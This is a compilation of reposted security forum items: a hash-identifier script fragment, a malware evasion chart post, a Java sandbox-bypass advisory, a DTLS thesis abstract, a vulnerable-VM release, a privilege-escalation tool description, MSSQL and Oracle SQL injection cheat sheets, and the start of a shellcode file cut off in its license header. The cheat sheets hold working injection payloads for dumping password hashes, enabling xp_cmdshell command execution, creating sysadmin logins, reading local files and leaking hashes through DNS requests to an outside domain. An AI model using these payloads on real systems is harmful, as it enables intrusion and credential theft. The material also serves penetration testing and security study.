hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: print " [+] SHA-384(Django)" jerar.append("121020") def SHA512(): hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122020") def SHA512HMAC(): hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122060") def Whirlpool(): hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122040") def WhirlpoolHMAC(): hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122080") print logo while True: jerar=[] print """ -------------------------------------------------------------------------""" hash = raw_input(" HASH: ") ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() if len(jerar)==0: print "" print " Not Found." elif len(jerar)>2: jerar.sort() print "" print "Possible Hashs:" print "[+] ",algorithms[jerar[0]] print "[+] ",algorithms[jerar[1]] print "" print "Least Possible Hashs:" for a in range(int(len(jerar))-2): print "[+] ",algorithms[jerar[a+2]] else: jerar.sort() print "" print "Possible Hashs:" for a in range(len(jerar)): print "[+] ",algorithms[jerar[a]] Posted by Marco Ramilli at 3:39 AM Sursa: Marco Ramilli's Blog: Hash Detector Tool

[h=2]Malware Evasion Chart[/h] Plenty of documents are describing how Malwares implement "Escape" techniques in order to evade Malware analysis. I did write posts on several of the most interesting evasion techniques ( available here and here) adding information on my side as well. Today I want to share a personal MAP that I made to correlate evasion techniques to detection techniques. It helped me a lot during some of my past talks as well as during my (research) malware writing nights. Aims of the following MAP is to correlate evasion techniques to detection techniques without preteding to be "cool/graphically appealing" or "complete". It wants to be "remind me what happens there". [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Malware Evasion Chart 101 (Download PDF)[/TD] [/TR] [/TABLE] The "soul" of the entire chart is stright int the center. Highlighted in blue shape the Analysis techniques. Highlighted in red shape the corresponding evasion techniques. In separate colored boxes significant examples of evasion techniques (again, there are many many many other ways to perform debugging traps/Red Pills/etc../etc... this wants to be only a "remind"). A glimpse of content: All the detection techniques could be clustered into two big groups: "Static Analisys" and "Dynamic Analysis". The Static analysis could be divided into "Signature" based techniques and "Decompiling" based techniques. The first set of techniques are based on signature matching. A signature is a set of bytes (not adjacent). The second set of techniques, look into binaries trying to understand behavior without running the binary on its own. These techniques are quite useful on pieces of data junk or not executable data. On the other side "dynamic analysis" where the analyst run the Malware. These techniques could be divided into "System Centric" and "Program Centric". The main difference between such techniques is the perspective. If you analyse the binary from inside you are "Program Centric" and so you might debug the bnary and/or look for internal API calls. If you are analyzing the binary from outside you are "System Centric" and you probably are sandboxing the binary. In the example boxes you find significative pieces of code and/or softwares that are used to achieve the evasion technique. For instance in the green box named "Code not run" PEditor shows how to modify the OEP (Original Entry Point) of a program to run unaligned code. In the box named "Breaking/watching/Catching point handlers" one of the most famous signal handlers have been shown and so forth and so on. If you find the MAP usefull, please leave a comment, if you'd like to expand it please send me an email I'd like to receive help in expanding it. Hope you'll enjoy. Sursa: Marco Ramilli's Blog: Malware Evasion Chart

[sE-2012-01] New Reflection API affected by a known 10+ years old attack From: Security Explorations <contact () security-explorations com> Date: Thu, 18 Jul 2013 06:50:30 +0200 Hello All, We discovered yet another indication that new Reflection API introduced into Java SE 7 was not a subject to a thorough security review (if any). A new vulnerability (Issue 69) that was submitted to Oracle today makes it possible to implement a very classic attack against Java VM. What's in particular interesting is that the attack itself has been in the public knowledge for at least 10+ years [1]. It's one of those risks one should protect against in the first place when new features are added to Java at the core VM level. The more surprising it is to discover that Reflection API introduced to Java SE 7 didn’t implement proper protection against this attack. Our Proof of Concept code for Issue 69 was confirmed to work with flying colors under Java SE 7 Update 25 (1.7.0_25-b16) and below. The code allows to violate a fundamental feature of Java VM security - the safety of its type system. As a result, a complete and reliable Java security sandbox bypass can be gained on a vulnerable instance of Oracle's Java SE software. Oracle's blog post published on May 30, 2013 [2] implies that maintaining the security-worthiness of Java has been Oracle’s priority following the acquisition of Sun Microsystems. Oracle's VP goes even further by indicating that "acquired product lines [such as Java SE] were required to conform to Oracle policies and procedures, including those comprising Oracle Software Security Assurance" [3]. If Oracle had any Software Security Assurance procedures adopted for Java SE, most of simple Reflection API flaws along with a known, 10+ years old attack should have been eliminated prior to Java SE 7 release. This didn't happen, thus it is reasonable to assume that Oracle's security policies and procedures are either not worth much or their implementation is far from perfect. That thought alone should catch attention of Oracle customers not necessarily relying on Java SE, but rather on other Oracle products, which were likely the subject to the very same, questionable Software Security Assurance policies and procedures as Java SE 7. -- As for other things, we released technical details and Proof of Concept code for a previously reported security vulnerability (Issue 61) that got fixed by Oracle's Java SE CPU in Jun 2013: http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf http://www.security-explorations.com/materials/se-2012-01-61.zip We also released technical details and Proof of Concept codes for several (9 in total) IBM Java flaws that were addressed by the company in early Jul 2013: http://www.security-explorations.com/materials/SE-2012-01-IBM-2.pdf http://www.security-explorations.com/materials/se-2012-01-62-68.zip The above includes details of trivially broken fixes for vulnerabilities reported to IBM in Sep 2012 (Issues 35-37 and 49). One of the issues is also a nice illustration of the "allowed behavior" (Issue 54) for other than Oracle's Java VM implementations. Finally, we published information (and some comment) about CVE numbers assigned by Oracle to vulnerabilities reported by Security Explorations as part of SE-2012-01 project: http://www.security-explorations.com/materials/SE-2012-01-CVE_Map.pdf Thank you. Best Regards Adam Gowdiak --------------------------------------------- Security Explorations Security Explorations "We bring security research to the new level" --------------------------------------------- References: [1] Java and Java VM security vulnerabilities and their exploitation techniques, Last Stage of Delirium Research Group, Welcome to LSD-PLaNET [2] Maintaining the security-worthiness of Java is Oracle’s priority https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of [3] Oracle Software Security Assurance Importance of Software Security Assurance _______________________________________________ Full-Disclosure - We believe in it. Charter: [Full-Disclosure] Mailing List Charter Hosted and sponsored by Secunia - Computer Security - Software & Alerts - Secunia Sursa: Full Disclosure: [sE-2012-01] New Reflection API affected by a known 10+ years old attack

Implementation and Evaluation of Datagram Transport Layer Security (DTLS) for the Android Operating System Master's Degree Project Stockholm, Sweden June 2012 Abstract Smartphones are nowadays a tool that everyone posses. With the replace- ment of the IPv4 with the IPv6 it is possible to connect to the Internet an ex- tremely large number of electronic devices. Those two factors are the premises to use smartphones to access those devices over a hybrid network, composed of Wireless Sensor Networks, IPv6-based Internet of Things, constrained networks and the conventional Internet. Some of these networks are very lossy and use the UDP protocol, hence the most suitable protocol to access resources is CoAP, a connection-less variant of the HTTP protocol, standardized as web protocol for the Internet of Things. The sensitivity of information and the Machine-to- Machine interaction as well as the presence of humans make the End-to-End security one of the requirements of the IPv6 Internet of Things. Secure CoAP (CoAPS) provide security for the CoAP protocol in this context. In this thesis secure CoAP for Android smartphones is designed implemented and evaluated, which is at the moment the rst work that enables CoAPS for smartphones. All the cryptographic cipher suites proposed in the CoAP protocol, among which the pre-shared key and certicate-based authentications are implemented, using the Elliptic Curve Cryptography and the AES algorithm in the CCM mode. The feasibility of this implementation is evaluated on a Nexus phone, which takes the handshake time in order to exchange parameters to secure the con- nection to about ve seconds, and an increase from one to three seconds of the DTLS retransmission timer. A part for this initial delays the performances us- ing secure CoAP are comparable to the performances obtained using the same protocol without security. The implementation allows also to secure the UDP transport thanks to the DTLS implementation, allowing any potential applica- tion to exchange secure data and have mutual authentication. Download: http://t.co/BFQbAeNWn4

Vulnerabilities in Full/Virtual Disk Encryption Products Neil Kettle neil/mu-b@digit-labs.org - digit-labs.org neil@digit-security.com - Digit Security Ltd SEC-T ’10 OUTLINE AGENDA FAQ FAQ - Why Bother? FAQ - Why BotherWith Drivers? Random Info DISCLAIMER PRODUCTS & VULNERABILITIES Generic Driver Design Products & Vulnerabilities Vulnerability Matrix CONCLUSIONS REFERENCES Download: http://www.digit-labs.org/files/presentations/sec-t-2010.pdf

[h=2]Vulnix (Vulnerable Linux) Release 1.0 [/h] Posted on September 10, 2012 by owen Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!) The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. The details are as follows: Architecture: x86 Format: VMware (vmx & vmdk) compatibility with version 4 onwards RAM: 512MB Network: NAT Extracted size: 820MB Compressed (download size): 194MB – 7zip format – 7zip can be obtained from here MD5 Hash of Vulnix.7z: 0bf19d11836f72d22f30bf52cd585757 - Download Vulnix from HERE - The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk Free free to contact me with any questions/comments using the comments section below. Enjoy! Sursa: Vulnix (Vulnerable Linux) Release 1.0 - Rebootuser Solutii: Vulnix (release 1.0) Solutions - Rebootuser

[h=1]windows-privesc-check[/h] A long time ago, I started writing a tool to look for local privilege escalation vectors on Windows systems – e.g. weak permissions on files, directories, service registy keys. I never quite got round to finishing it, but the project could still be useful to pentesters and auditors in its current part-finished state. I’d suggest giving it a try next time you do a security audit with local administrator rights, or next time you get a non-admin logon to a Windows system during a pentest. It was designed to be useful for both. Trunk contains the best all-round version. It checks some file, directory, registry and service permissions (among other things). Reports are in HTML. The newer wpc-2.0 branch does a better job at auditing Windows services – but does little else. Reports are in text only. You only need to download the .exe file. Full source code is available too, though. It’s written in Python, uses pywin32 and “compiled” with pyinstaller. You don’t need to download any dependencies (even python) unless you’re planning to build the .exe yourself. [h=2]FAQ[/h] [h=3]Why 2 versions?[/h] The code in “trunk” wasn’t object-oriented, making it harder to work with. I rewrote it to create the “wpc-2.0? branch. Much better – but alas, not finished. [h=3]Can I see the source code?[/h] Yes, it’s on google code along with the executables. [h=3]Will the program elevate privileges for me?[/h] No. It gives you a report describing any potential vulnerabilities it finds, but doesn’t have any autopwn features. This is mostly to reduce the risk of my code accidentally breaking your client’s system Sursa: windows-privesc-check | pentestmonkey

[h=1]MSSQL Injection Cheat Sheet[/h] Some useful syntax reminders for SQL Injection into MSSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is: Oracle MSSQL MySQL PostgreSQL Ingres DB2 Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. [TABLE] [TR] [TD]Version[/TD] [TD]SELECT @@version[/TD] [/TR] [TR] [TD]Comments[/TD] [TD]SELECT 1 — comment SELECT /*comment*/1[/TD] [/TR] [TR] [TD]Current User[/TD] [TD]SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID[/TD] [/TR] [TR] [TD]List Users[/TD] [TD]SELECT name FROM master..syslogins[/TD] [/TR] [TR] [TD]List Password Hashes[/TD] [TD]SELECT name, password FROM master..sysxlogins — priv, mssql 2000; SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer. SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005; SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005[/TD] [/TR] [TR] [TD] Password Cracker[/TD] [TD]MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.[/TD] [/TR] [TR] [TD]List Privileges[/TD] [TD]– current privs on a particular object in 2005, 2008 SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current database SELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current server SELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a table SELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’); –permissions on a user– current privs in 2005, 2008 SELECT is_srvrolemember(‘sysadmin’); SELECT is_srvrolemember(‘dbcreator’); SELECT is_srvrolemember(‘bulkadmin’); SELECT is_srvrolemember(‘diskadmin’); SELECT is_srvrolemember(‘processadmin’); SELECT is_srvrolemember(‘serveradmin’); SELECT is_srvrolemember(‘setupadmin’); SELECT is_srvrolemember(‘securityadmin’); – who has a particular priv? 2005, 2008 SELECT name FROM master..syslogins WHERE denylogin = 0; SELECT name FROM master..syslogins WHERE hasaccess = 1; SELECT name FROM master..syslogins WHERE isntname = 0; SELECT name FROM master..syslogins WHERE isntgroup = 0; SELECT name FROM master..syslogins WHERE sysadmin = 1; SELECT name FROM master..syslogins WHERE securityadmin = 1; SELECT name FROM master..syslogins WHERE serveradmin = 1; SELECT name FROM master..syslogins WHERE setupadmin = 1; SELECT name FROM master..syslogins WHERE processadmin = 1; SELECT name FROM master..syslogins WHERE diskadmin = 1; SELECT name FROM master..syslogins WHERE dbcreator = 1; SELECT name FROM master..syslogins WHERE bulkadmin = 1; [/TD] [/TR] [TR] [TD]List DBA Accounts[/TD] [TD]SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username. SELECT name FROM master..syslogins WHERE sysadmin = ’1? — tested on 2005[/TD] [/TR] [TR] [TD]Current Database[/TD] [TD]SELECT DB_NAME()[/TD] [/TR] [TR] [TD]List Databases[/TD] [TD]SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — for N = 0, 1, 2, …[/TD] [/TR] [TR] [TD]List Columns[/TD] [TD]SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable[/TD] [/TR] [TR] [TD]List Tables[/TD] [TD]SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’; SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable[/TD] [/TR] [TR] [TD]Find Tables From Column Name[/TD] [TD]– NB: This example works only for the current database. If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects). SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’[/TD] [/TR] [TR] [TD]Select Nth Row[/TD] [TD]SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row[/TD] [/TR] [TR] [TD]Select Nth Char[/TD] [TD]SELECT substring(‘abcd’, 3, 1) — returns c[/TD] [/TR] [TR] [TD]Bitwise AND[/TD] [TD]SELECT 6 & 2 — returns 2 SELECT 6 & 1 — returns 0[/TD] [/TR] [TR] [TD]ASCII Value -> Char[/TD] [TD]SELECT char(0×41) — returns A[/TD] [/TR] [TR] [TD]Char -> ASCII Value[/TD] [TD]SELECT ascii(‘A’) – returns 65[/TD] [/TR] [TR] [TD]Casting[/TD] [TD]SELECT CAST(’1? as int); SELECT CAST(1 as char)[/TD] [/TR] [TR] [TD]String Concatenation[/TD] [TD]SELECT ‘A’ + ‘B’ – returns AB[/TD] [/TR] [TR] [TD]If Statement[/TD] [TD]IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1[/TD] [/TR] [TR] [TD]Case Statement[/TD] [TD]SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1[/TD] [/TR] [TR] [TD]Avoiding Quotes[/TD] [TD]SELECT char(65)+char(66) — returns AB[/TD] [/TR] [TR] [TD]Time Delay[/TD] [TD] WAITFOR DELAY ’0:0:5? — pause for 5 seconds[/TD] [/TR] [TR] [TD]Make DNS Requests[/TD] [TD]declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\’ + @host + ‘c$boot.ini”’); — nonpriv, works on 2000declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\’ + @host + ‘c$boot.ini”’); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. – Also check out theDNS tunnel feature of sqlninja[/TD] [/TR] [TR] [TD]Command Execution[/TD] [TD]EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default: EXEC sp_configure ‘show advanced options’, 1; — priv RECONFIGURE; — priv EXEC sp_configure ‘xp_cmdshell’, 1; — priv RECONFIGURE; — priv[/TD] [/TR] [TR] [TD]Local File Access[/TD] [TD]CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM ‘c:boot.ini’; DROP TABLE mydata;[/TD] [/TR] [TR] [TD]Hostname, IP Address[/TD] [TD]SELECT HOST_NAME()[/TD] [/TR] [TR] [TD]Create Users[/TD] [TD]EXEC sp_addlogin ‘user’, ‘pass’; — priv[/TD] [/TR] [TR] [TD]Drop Users[/TD] [TD]EXEC sp_droplogin ‘user’; — priv[/TD] [/TR] [TR] [TD]Make User DBA[/TD] [TD]EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv[/TD] [/TR] [TR] [TD]Location of DB files[/TD] [TD]EXEC sp_helpdb master; –location of master.mdf EXEC sp_helpdb pubs; –location of pubs.mdf[/TD] [/TR] [TR] [TD]Default/System Databases[/TD] [TD]northwind model msdb pubs — not on sql server 2005 tempdb[/TD] [/TR] [/TABLE] [h=3]Misc Tips[/h] In no particular order, here are some suggestions from pentestmonkey readers. From Dan Crowley: A way to extract data via SQLi with a MySQL backend From Jeremy Bae: Tip about sp_helpdb – included in table above. From Trip: List DBAs (included in table above now): [INDENT]select name from master..syslogins where sysadmin = ’1? [/INDENT] From Daniele Costa: Tips on using fn_my_permissions in 2005, 2008 – included in table above. Also: To check permissions on multiple database you will have to use the following pattern. [INDENT]USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, ‘DATABASE’) [/INDENT] Note also that in case of using this data with a UNION query a collation error could occur. In this case a simple trick is to use the following syntax: [INDENT] select permission_name collate database_default FROM fn_my_permissions (NULL, ‘DATABASE’) [/INDENT] Sursa: MSSQL Injection Cheat Sheet | pentestmonkey

[h=1]Oracle SQL Injection Cheat Sheet[/h] Some useful syntax reminders for SQL Injection into Oracle databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is: Oracle MSSQL MySQL PostgreSQL Ingres DB2 Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. [TABLE] [TR] [TD]Version[/TD] [TD]SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance;[/TD] [/TR] [TR] [TD]Comments[/TD] [TD]SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.[/TD] [/TR] [TR] [TD]Current User[/TD] [TD]SELECT user FROM dual[/TD] [/TR] [TR] [TD]List Users[/TD] [TD]SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; — priv[/TD] [/TR] [TR] [TD]List Password Hashes[/TD] [TD]SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked SELECT name,spare4 FROM sys.user$ — priv, 11g[/TD] [/TR] [TR] [TD] Password Cracker[/TD] [TD]checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.[/TD] [/TR] [TR] [TD]List Privileges[/TD] [TD]SELECT * FROM session_privs; — current privs SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;[/TD] [/TR] [TR] [TD]List DBA Accounts[/TD] [TD]SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles[/TD] [/TR] [TR] [TD]Current Database[/TD] [TD]SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL;[/TD] [/TR] [TR] [TD]List Databases[/TD] [TD]SELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status).[/TD] [/TR] [TR] [TD]List Columns[/TD] [TD]SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;[/TD] [/TR] [TR] [TD]List Tables[/TD] [TD]SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables;[/TD] [/TR] [TR] [TD]Find Tables From Column Name[/TD] [TD]SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case[/TD] [/TR] [TR] [TD]Select Nth Row[/TD] [TD]SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)[/TD] [/TR] [TR] [TD]Select Nth Char[/TD] [TD]SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’[/TD] [/TR] [TR] [TD]Bitwise AND[/TD] [TD]SELECT bitand(6,2) FROM dual; — returns 2 SELECT bitand(6,1) FROM dual; — returns0[/TD] [/TR] [TR] [TD]ASCII Value -> Char[/TD] [TD]SELECT chr(65) FROM dual; — returns A[/TD] [/TR] [TR] [TD]Char -> ASCII Value[/TD] [TD]SELECT ascii(‘A’) FROM dual; — returns 65[/TD] [/TR] [TR] [TD]Casting[/TD] [TD]SELECT CAST(1 AS char) FROM dual; SELECT CAST(’1? AS int) FROM dual;[/TD] [/TR] [TR] [TD]String Concatenation[/TD] [TD]SELECT ‘A’ || ‘B’ FROM dual; — returns AB[/TD] [/TR] [TR] [TD]If Statement[/TD] [TD]BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements[/TD] [/TR] [TR] [TD]Case Statement[/TD] [TD]SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2[/TD] [/TR] [TR] [TD]Avoiding Quotes[/TD] [TD]SELECT chr(65) || chr(66) FROM dual; — returns AB[/TD] [/TR] [TR] [TD]Time Delay[/TD] [TD]BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT SELECT UTL_INADDR.get_host_name(’10.0.0.1?) FROM dual; — if reverse looks are slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow – Also see Heavy Queries to create a time delay[/TD] [/TR] [TR] [TD]Make DNS Requests[/TD] [TD]SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;[/TD] [/TR] [TR] [TD]Command Execution[/TD] [TD]Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. [/TD] [/TR] [TR] [TD]Local File Access[/TD] [TD]UTL_FILE can sometimes be used. Check that the following is non-null: SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).[/TD] [/TR] [TR] [TD]Hostname, IP Address[/TD] [TD]SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address SELECT UTL_INADDR.get_host_name(’10.0.0.1?) FROM dual; — gets hostnames[/TD] [/TR] [TR] [TD]Location of DB files[/TD] [TD]SELECT name FROM V$DATAFILE;[/TD] [/TR] [TR] [TD]Default/System Databases[/TD] [TD]SYSTEM SYSAUX[/TD] [/TR] [/TABLE] [h=3]Misc Tips[/h] In no particular order, here are some suggestions from pentestmonkey readers. From Christian Mehlmauer: [TABLE] [TR] [TD]Get all tablenames in one string[/TD] [TD]select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables – when using union based SQLI with only one row[/TD] [/TR] [TR] [TD]Blind SQLI in order by clause[/TD] [TD]order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — you must know 2 column names with the same datatype[/TD] [/TR] [/TABLE] Sursa: Oracle SQL Injection Cheat Sheet | pentestmonkey

setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # * Neither the name of the Nth Dimension nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # 